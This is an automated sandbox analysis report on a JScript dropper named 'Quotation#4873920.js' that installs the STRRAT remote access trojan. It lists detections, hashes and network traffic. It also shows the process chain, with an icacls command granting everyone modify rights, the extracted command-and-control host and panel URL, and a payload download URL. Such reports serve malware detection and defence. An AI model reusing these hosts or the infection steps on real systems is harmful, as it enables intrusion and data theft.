Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation#4873920.js

Overview

General Information

Sample name:Quotation#4873920.js
Analysis ID:1524793
MD5:0444071c6c7d8675aa708e00bdad9787
SHA1:639c3c2fc315ce73b3d179be4ba1fa8c94644c9b
SHA256:cb19162767f15a3043137f8124c6df663861b6537b28cfe7d930fd18cec33c6b
Tags:jsuser-abuse_ch
Infos:

Detection

STRRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected STRRAT
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected AllatoriJARObfuscator
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Queries the installed Java version
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6408 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation#4873920.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • javaw.exe (PID: 6556 cmdline: "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\rybdyjbhxf.txt" MD5: 6E0F4F812AE02FBCB744A929E74A04B8)
      • icacls.exe (PID: 6628 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M MD5: 2E49585E4E08565F52090B144062F97E)
        • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

Threatname: STRRAT

{"C2 list": "harold.jetos.com:3608", "url": "http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5", "Proxy": "harold.jetos.com:3608", "lid": "khonsari", "Startup": "false", "Secondary Startup": "true", "Scheduled Task": "true"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.3369356460.0000000009B63000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security
    00000002.00000002.3369356460.0000000009B63000.00000004.00000800.00020000.00000000.sdmpINDICATOR_JAVA_Packed_AllatoriDetects files packed with Allatori Java ObfuscatorditekSHen
    • 0x24f4:$s1: # Obfuscation by Allatori Obfuscator
    00000002.00000002.3369356460.0000000009B69000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_STRRATYara detected STRRATJoe Security
      00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security
        00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmpINDICATOR_JAVA_Packed_AllatoriDetects files packed with Allatori Java ObfuscatorditekSHen
        • 0x3024:$s1: # Obfuscation by Allatori Obfuscator
        Click to see the 3 entries

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation#4873920.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation#4873920.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation#4873920.js", ProcessId: 6408, ProcessName: wscript.exe
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation#4873920.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation#4873920.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation#4873920.js", ProcessId: 6408, ProcessName: wscript.exe

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Found malware configuration
        Source: rybdyjbhxf.txt.0.drMalware Configuration Extractor: STRRAT {"C2 list": "harold.jetos.com:3608", "url": "http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5", "Proxy": "harold.jetos.com:3608", "lid": "khonsari", "Startup": "false", "Secondary Startup": "true", "Scheduled Task": "true"}
        Multi AV Scanner detection for domain / URL
        Source: http://wshsoft.company/jv/jrex.zipVirustotal: Detection: 13%Perma Link
        Multi AV Scanner detection for submitted file
        Source: Quotation#4873920.jsReversingLabs: Detection: 24%
        Source: Quotation#4873920.jsVirustotal: Detection: 37%Perma Link
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49709 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49710 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49714 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49723 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49724 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49725 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49726 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49727 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49729 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49734 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49737 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49738 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49741 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49740 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49739 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49742 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49743 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49744 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49745 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49746 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49747 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49748 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49749 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49750 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49752 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49753 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49754 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49755 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49756 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49757 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49758 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49759 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49760 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49761 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49762 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49763 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49764 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49765 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49766 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49767 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49768 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49769 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49770 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49771 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49772 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49773 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49774 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49775 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49776 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49777 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49778 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49779 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49780 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49781 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49782 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49783 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49784 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49785 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49786 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49787 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49788 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49789 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49790 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49791 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49792 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49793 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49794 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49795 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49796 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49797 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49798 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49799 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49800 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49801 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49802 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49803 version: TLS 1.2
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 4x nop then cmp eax, dword ptr [ecx+04h]2_2_0243CAD8
        Source: Joe Sandbox ViewIP Address: 199.232.192.209 199.232.192.209
        Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
        Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
        Source: Joe Sandbox ViewIP Address: 140.82.121.4 140.82.121.4
        Source: Joe Sandbox ViewJA3 fingerprint: 026e5ca865ce1f09da3a81d8a4e3effb
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: github.com
        Source: global trafficDNS traffic detected: DNS query: repo1.maven.org
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugreport.sun.com/bugreport/
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009BFB000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009BFB000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009BFB000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009C04000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009C04000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009B69000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3369356460.0000000009C0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://java.oracle.com/
        Source: javaw.exe, 00000002.00000002.3373832091.0000000015062000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.2149100167.000000001506B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3369356460.0000000009D16000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.3158902569.0000000015062000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://null.oracle.com/
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009BFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009B69000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
        Source: wscript.exe, 00000000.00000003.2096642699.0000022D3E1A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095178342.0000022D3DF1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2091937928.0000022D3DCCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2112718585.0000022D3DF53000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095178342.0000022D3DEF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095452260.0000022D3DF73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095984399.0000022D3DF49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2112693783.0000022D3DF12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wshsoft.company/jv/jrex.zip
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009B63000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.allatori.com
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009D7D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
        Source: javaw.exe, 00000002.00000002.3367891191.00000000048B8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.0000000004800000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.0000000004744000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.000000000497A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.0000000004600000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.00000000046A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
        Source: javaw.exe, 00000002.00000002.3367891191.00000000046A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009D7D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: javaw.exe, 00000002.00000002.3367891191.000000000490B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.0000000004930000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.000000000478E000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.0000000004629000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.00000000046D4000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.0000000004600000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.0000000004615000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.000000000476E000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.0000000004849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://repo1.maven.org
        Source: javaw.exe, 00000002.00000002.3367891191.0000000004849000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3374241246.00000000154B8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jar
        Source: javaw.exe, 00000002.00000002.3367891191.0000000004849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jar
        Source: javaw.exe, 00000002.00000002.3367891191.0000000004849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jar
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://repository.luxtrust.lu
        Source: javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://repository.luxtrust.lu0
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
